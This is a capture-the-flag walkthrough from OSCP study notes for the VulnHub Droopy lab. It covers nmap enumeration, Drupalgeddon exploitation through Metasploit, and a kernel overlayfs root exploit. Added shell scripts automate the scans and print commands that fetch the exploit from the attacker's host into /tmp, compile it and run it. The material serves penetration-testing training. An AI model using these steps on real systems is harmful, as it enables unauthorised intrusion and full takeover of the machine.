OSCP Learning Notes - Capstone(3)
DroopyCTF Walkthrough
Preparation:
Download the DroopyCTF virtual machine from the following website:
https://www.vulnhub.com/entry/droopy-v02,143/
1. Scan the network to find the IP address of the DroopyCTF server. The prefix length below is assumed from the target address 10.0.0.30 (the original line was cut off after the slash):
netdiscover -r 10.0.0.0/24
2. Scan the DroopyCTF server with Nmap to find potential vulnerabilities. The numeric arguments of several options were lost from these notes; the values shown are typical choices, not the ones originally used.
TCP Scan 1 (SYN scan of every TCP port; -p1- means ports 1 through 65535):
nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20ms --defeat-rst-ratelimit -T4 -p1- -oN /root/Delete/tcp1.txt 10.0.0.30
TCP Scan 2 (version detection and default scripts, only against the ports scan 1 reported open):
nmap -nvv -Pn -sSV -p <open ports from scan 1> --version-intensity 9 -A -oN /root/Delete/tcp2.txt 10.0.0.30
UDP Scan (the most common UDP ports only, because a full UDP sweep is slow):
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/Delete/udp.txt 10.0.0.30
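The two-stage scan above can be scripted so that the slow version scan only touches the ports the fast SYN scan found. The script below is an added example, not part of the original notes: it parses nmap's -oN output (a constructed sample is embedded), builds the second command from the result, and only runs the live scans when DROOPY_TARGET is set. The option values and the SCAN_DIR variable are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): staged port enumeration.
# Stage 1 finds open TCP ports, stage 2 runs the slow version/script scan
# against those ports only. The live scans run only when DROOPY_TARGET is
# set; the text-processing helpers run anywhere.

# Constructed sample of 'nmap -oN' output, used to exercise the parser.
# It is not the real Droopy scan result.
sample_nmap_output() {
  cat <<'EOF'
# Nmap 7.80 scan initiated Sat Jun 20 10:00:00 2020 as: nmap -Pn -sS -p1- -oN tcp1.txt 10.0.0.30
Nmap scan report for 10.0.0.30
Host is up (0.00031s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
111/tcp  filtered rpcbind
8080/tcp closed   http-proxy
# Nmap done at Sat Jun 20 10:02:11 2020 -- 1 IP address (1 host up) scanned in 131.02 seconds
EOF
}

# Read -oN output on stdin and print the open port numbers comma-separated,
# in the form the -p option expects. Filtered and closed ports are skipped.
open_ports_from_nmap() {
  awk '$1 ~ "^[0-9]+/(tcp|udp)$" && $2 == "open" {
         split($1, a, "/")
         ports = ports (n++ ? "," : "") a[1]
       }
       END { printf "%s", ports }'
}

# Compose the stage-2 command for a target, a port list and an output file.
# The version-intensity value is an assumed choice (the notes lost it).
stage2_scan_cmd() {
  printf 'nmap -nvv -Pn -sSV -p%s --version-intensity 9 -A -oN %s %s' "$2" "$3" "$1"
}

# Live workflow: only when pointed at a target, e.g. DROOPY_TARGET=10.0.0.30.
if [ -n "${DROOPY_TARGET:-}" ]; then
  out=${SCAN_DIR:-/root/Delete}
  mkdir -p "$out"
  nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20ms \
       --defeat-rst-ratelimit -T4 -p1- -oN "$out/tcp1.txt" "$DROOPY_TARGET"
  ports=$(open_ports_from_nmap < "$out/tcp1.txt")
  if [ -n "$ports" ]; then
    # The port list only ever contains digits and commas, so eval is safe here.
    eval "$(stage2_scan_cmd "$DROOPY_TARGET" "$ports" "$out/tcp2.txt")"
  else
    echo "no open TCP ports found; check the stage-1 output" >&2
  fi
  nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 \
       -oN "$out/udp.txt" "$DROOPY_TARGET"
fi
```

The parser is the part that matters: it discards filtered and closed lines so the -p list stays short, and the version scan is skipped with a message when nothing is open instead of scanning an empty port list.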
3. Browse the website (http://10.0.0.30/) in Firefox. Nothing valuable is found in the page source.
Browse http://10.0.0.30/robots.txt in Firefox. Drupal ships a default robots.txt that disallows files such as /CHANGELOG.txt, which both fingerprints the CMS and points at the next file to read.
Browse http://10.0.0.30/CHANGELOG.txt in Firefox. The first line of Drupal's changelog names the installed release, Drupal 7.0 here, which is the version to look up for vulnerabilities.
Search the Exploit Database for exploits matching Drupal 7.0 and download the exploit code. EDB-ID 34992 is the "Drupalgeddon" SQL injection (CVE-2014-3704, fixed in Drupal 7.32), which needs no authentication and adds an administrator account:
https://www.exploit-db.com/exploits/34992
The same titles can be listed locally on Kali Linux with searchsploit:
searchsploit drupal
and the matching modules can be searched inside Metasploit:
search drupal
4. Exploit the target server with Metasploit.
Use the exploit/multi/http/drupal_drupageddon module and read its info page: it covers the Drupal 7.0 to 7.31 range, so it should work here.
Set the options (the target host and URI, and the listener address for the payload) and run the exploit. We have a shell.
Collect information about the Droopy server, in particular the kernel release and the distribution, since they decide the privilege escalation route.
Search the Exploit Database for the Linux kernel 3.13.0 and download the exploit code. EDB-ID 37292 is the overlayfs local privilege escalation (CVE-2015-1328) for Ubuntu kernels from 3.13.0 up to, but not including, 3.19:
https://www.exploit-db.com/exploits/37292
Copy the code to the /var/www/html folder on Kali Linux so that Apache serves it, then download it onto the Droopy server. The exploit is compiled on the target, so it needs gcc there; later Ubuntu builds of the 3.13.0 kernel carry the fix, so a match on the base version is a lead to test rather than a guarantee.
The Metasploit shell is not a full TTY, which makes interactive commands awkward. Look up a TTY shell escape cheat sheet (https://netsec.ws/?p=337) and upgrade the shell with Python:
python -c 'import pty; pty.spawn("/bin/sh")'
5. Download the exploit source code into the /tmp folder on the Droopy server (writable by any user), compile it, and execute the resulting binary.
Root privileges are obtained successfully.
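The kernel release gathered from the shell decides whether EDB 37292 is worth staging. The script below is an added example, not from the original notes: it applies the exploit's 3.13.0 up to 3.19 range to a uname -r string, records the Ubuntu build number because the fix was backported into later 3.13.0 builds, and prints the pty upgrade, transfer, compile and run sequence for the target. The KALI_IP variable, the 37292.c and ofs file names, and serving from Apache on Kali are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): gate and stage the kernel
# privilege escalation. EDB 37292 (CVE-2015-1328, overlayfs) covers Ubuntu
# kernels from 3.13.0 up to but not including 3.19; the check below applies
# that range to a 'uname -r' string. Names and paths are assumptions.

# Return 0 when a release string such as "3.13.0-24-generic" falls in the
# 3.13 <= major.minor < 3.19 range of the exploit.
overlayfs_kernel_in_range() {
  base=${1%%-*}                 # "3.13.0-24-generic" -> "3.13.0"
  major=${base%%.*}
  rest=${base#*.}; minor=${rest%%.*}
  if [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -lt 19 ]; then
    return 0
  fi
  return 1
}

# Ubuntu ABI build number, e.g. "24" from "3.13.0-24-generic". Ubuntu
# backported the fix into later 3.13.0 builds, so a base-version match is a
# lead to test, not proof; record the build so the result can be compared.
ubuntu_abi_build() {
  rest=${1#*-}
  printf '%s' "${rest%%-*}"
}

# Kali side: put the mirrored source in the web root the notes use.
serve_exploit_source() {
  cp "$1" /var/www/html/37292.c && systemctl start apache2
}

# Target side, pasted into the Metasploit shell: upgrade to a pty first
# (the cheat-sheet one-liner), then fetch, build and run from /tmp.
target_side_commands() {
  cat <<EOF
python -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp && wget -q http://$1/37292.c -O ofs.c
command -v gcc >/dev/null || echo "no gcc on target: compile elsewhere"
gcc ofs.c -o ofs && ./ofs
EOF
}

# Live use on the target, e.g. KALI_IP=10.0.0.5 (not run by the tests).
if [ -n "${KALI_IP:-}" ]; then
  rel=$(uname -r)
  if overlayfs_kernel_in_range "$rel"; then
    echo "kernel $rel (build $(ubuntu_abi_build "$rel")) is in the 37292 range" >&2
    target_side_commands "$KALI_IP"
  else
    echo "kernel $rel is outside 3.13-3.18; look for another vector" >&2
  fi
fi
```

Mirror the source on Kali with searchsploit -m 37292 before handing it to serve_exploit_source. The printed target-side sequence checks for gcc before compiling, since the exploit is built on the victim in this walkthrough and a box without a compiler needs a different plan.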